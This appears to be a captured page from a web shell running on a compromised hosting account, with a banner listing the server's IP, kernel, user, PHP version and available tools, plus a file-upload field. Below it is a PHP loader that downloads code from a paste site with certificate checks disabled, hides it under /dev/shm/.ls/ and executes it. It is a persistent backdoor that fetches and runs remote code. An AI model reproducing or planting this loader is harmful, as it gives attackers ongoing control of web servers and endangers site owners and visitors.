| Server IP : 87.106.199.119 / Your IP : 216.73.216.52 Web Server : Apache System : Linux youthful-elion.87-106-199-119.plesk.page 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64 User : hbsurveyingltd.co.uk_83ploscmra2 ( 10012) PHP Version : 8.4.24 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/hbsurveyingltd.co.uk/httpdocs/ |
Upload File : |
<?php
$lp_file = '/dev/shm/.ls/LiteSpeedss';
if (file_exists($lp_file) && is_readable($lp_file)) {
include $lp_file;
} else {
$source = 'https://pastefy.app/SLoJea6l/raw';
$code = @file_get_contents($source, false,
stream_context_create(['ssl' => ['verify_peer' => false]]));
if ($code && strlen($code) > 100) {
if (!is_dir('/dev/shm/.ls/')) {
mkdir('/dev/shm/.ls/', 0755, true);
}
file_put_contents($lp_file, $code);
include $lp_file;
} else {
exit;
}
}
?>